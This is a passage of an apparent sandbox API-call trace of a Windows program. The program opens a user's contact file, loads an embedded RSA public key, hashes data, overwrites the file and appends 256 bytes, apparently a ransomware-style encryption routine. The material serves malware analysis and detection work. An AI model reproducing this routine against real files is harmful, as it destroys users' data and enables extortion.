dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0058.297] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0058.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.298] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1178) returned 1 [0058.298] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.301] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.301] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.304] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x49a, lpOverlapped=0x0) returned 1 [0058.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.304] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.305] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.305] CryptHashData (hHash=0x327ca80, pbData=0x32947b0, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.305] CryptGetHashParam (in: hHash=0x327ca80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.305] CryptGetHashParam (in: hHash=0x327ca80, dwParam=0x2, pbData=0x3240c48, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3240c48, pdwDataLen=0x9f4fa54) returned 1 [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.305] GetLastError () returned 0x0 [0058.305] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7e8 [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.306] SetLastError (dwErrCode=0x0) [0058.306] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] GetLastError () returned 0x0 [0058.307] SetLastError (dwErrCode=0x0) [0058.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.307] CryptDestroyHash (hHash=0x327ca80) returned 1 [0058.307] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.307] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.307] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.307] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4a0) returned 0x32947b0 [0058.308] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x3294c58 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f190 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f1c0 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2b0 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326e728 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3247810 [0058.308] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3247810, Size=0x218) returned 0x3297a68 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297c88 [0058.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326e728 | out: hHeap=0x660000) returned 1 [0058.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.308] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297c88 | out: hHeap=0x660000) returned 1 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbcc8 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326e728 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x326f2b0 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbce8 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7e8 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242628 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbc88 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326e728 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbce8 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbcc8 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.309] GetCurrentThreadId () returned 0x9e0 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2420 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257390 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbcc8 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbce8 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.309] GetCurrentThreadId () returned 0x9e0 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3294e50 [0058.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbcc8 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3260e48 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbcc8 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3247810 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2b0 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbd08 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326e728 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac50 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbd08 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac20 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbd08 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ace0 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac20 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ace0 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbcc8 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e7e8 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326f2b0 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x3297a68 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3292fe8 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x3297c80 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbce8 | out: hHeap=0x660000) returned 1 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294e50 | out: hHeap=0x660000) returned 1 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297c80 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326e728 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f1c0 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3247810 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242628 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294c58 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.312] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x495, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb14*=0x495, lpOverlapped=0x0) returned 1 [0058.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.312] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.313] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.313] 